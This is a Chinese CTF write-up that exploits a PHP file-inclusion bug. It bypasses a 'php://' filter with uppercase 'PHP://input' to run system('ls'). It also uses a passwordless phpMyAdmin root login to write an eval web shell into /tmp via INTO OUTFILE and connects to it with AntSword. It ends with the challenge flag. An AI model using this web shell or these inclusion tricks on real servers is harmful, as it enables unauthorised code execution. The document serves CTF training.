xctf高级篇-4(文件包含,php伪协议,mysql写入小马及蚁剑的使用)

lcq

1.看题目  考察文件包含



2.打开页面



<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];     
while (strstr($page, "php://")) {   
    $page=str_replace("php://", "", $page);
}
include($page);
?>
发现是代码审计，通过get的方法获取page参数到page变量中，其中变量page经过处理，不能包含"php://"字符，但是strstr()函数不区分大小写，所以可以使用"PHP://"来进行php伪协议的利用
https://www.php.net/manual/zh/wrappers.php.php


3.使用PHP://input 再post一个带有system('ls')方法的php文件进去

可以发现一个fl4gisisish3r3.php，盲菜flag在这个文件内部-->使用cat方法查看

不显示。不知道为什么 换个方法吧


1.扫描目录

发现了phpmyadmin




2.进入phpmyadmin
尝试弱密码，发现账号root  无密码

便可以写入小马到服务器中
select "<?php eval(@$_POST['flag'])?>"
into outfile '/tmp/a.php'   
tmp文件夹权限较低，几乎都可以写入



3.用蚁剑连接http://111.198.29.45:38333/?page=/tmp/a.php密码flag

进入后打开文件，得到flag



ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}
END


总结，多个方法可解，通过php伪协议的使用或者mysql写入小马，再连接